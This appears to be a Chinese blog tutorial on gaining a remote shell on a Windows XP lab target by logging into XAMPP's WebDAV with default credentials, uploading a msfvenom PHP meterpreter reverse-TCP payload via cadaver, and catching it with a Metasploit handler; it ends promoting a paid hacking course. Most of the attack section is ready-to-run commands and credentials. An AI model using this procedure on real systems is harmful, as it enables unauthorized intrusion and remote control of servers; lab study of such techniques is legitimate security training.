使用WebDav默認口令上傳php遠控,不用雙擊運行也能拿到shell

用於網絡安全滲透測試,禁止用於不當目的!

測試環境

之前我們搭建的測試靶機xp,已經內置了XAMPP web服務器組件。

在這個XAMPP組件中,大家可以看到安裝有phpMyAdmin軟件,它是一個網頁版的數據庫管理平臺,顯然我們可以看到xp安裝了apache服務,支持web形式的訪問和數據支持,另外還有php組件,說明只要通過任何瀏覽器訪問xp的web服務頁面地址路徑(通常指定一個php後綴的文件),就能打開php的文件。

使用WebDav默認口令上傳php遠控,不用雙擊運行也能拿到shell

使用WebDav默認口令上傳php遠控,不用雙擊運行也能拿到shell

攻擊思路:

既然xp安裝了xampp,等同於可以運行php後綴的文件,我們只要通過一些技術手段上傳一個php載荷小馬即可,這種php載荷是不用在目標靶機進行運行的,我們只需要在本地kali進行遠程觸發即可(因為php或者jsp類型的文件本來就是放在web服務器根目錄中讓他人通過瀏覽器進行訪問讀取的!懂?)

注意:xp靶機的xampp必須開啟!

使用WebDav默認口令上傳php遠控,不用雙擊運行也能拿到shell

實戰測試

  • 生成windows平臺php遠控

kali終端下輸入:

<code>msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.31.251 LPORT=8888 -f raw > xiaobai.php/<code>
使用WebDav默認口令上傳php遠控,不用雙擊運行也能拿到shell

  • 發送遠控

這裡我們需要上傳xiaobai.php小馬到我們的xp服務器(xampp)中。

那如何實現上傳呢?

其實在xp上安裝的這個xampp存在WebDAV服務器程序,而且這個版本xampp的WebDAV口令都是默認的(一般不會更改)(一般web掃描軟件並不會發現)

WebDAV是一個分佈式文件管理服務器,用於上下傳文件使用的。我們可以使用kali自帶的客戶端Cadaver程序來進行連接。

Kali終端下輸入:

<code>cadaver/<code>

默認的用戶名是:wampp,密碼是xampp!

如圖:你發現已經成功進行了連接,而且還能使用ls命令查看當前webdav目錄下的文件,甚至可以刪除、上傳、下載!這就是我們的一個突破口!

使用WebDav默認口令上傳php遠控,不用雙擊運行也能拿到shell

在webdav的當前終端下輸入:

<code>?/<code>

即可顯示所有支持的命令!我們這裡選擇put命令,上傳kali的php小馬上去!

使用WebDav默認口令上傳php遠控,不用雙擊運行也能拿到shell

輸入:

<code>put xiaobai.php/<code>

你會發現已經成功上傳我們的php載荷到xp的webdav服務器中了,你可以使用ls再次查看!

使用WebDav默認口令上傳php遠控,不用雙擊運行也能拿到shell

  • 設置msf監聽

Kali終端下輸入:

<code>msfconsole,啟動metasploit/<code>

設置相關偵聽模塊和載荷以及參數

<code>use multi/handler
set payload php/meterpreter/reverse_tcp
set LHOSTS 192.168.31.251
set LPORT 8888
run/<code>
使用WebDav默認口令上傳php遠控,不用雙擊運行也能拿到shell

提示:這裡的meterpreter會話有時候不一定會建立成功,但是這種攻擊方法,你一定要會,在web滲透中,這就是常用的伎倆。

關注小白嘿客,學習完整的web滲透,可以點擊 進入我的嘿客專欄獲得永久學習哦!

使用WebDav默認口令上傳php遠控,不用雙擊運行也能拿到shell


分享到:


相關文章: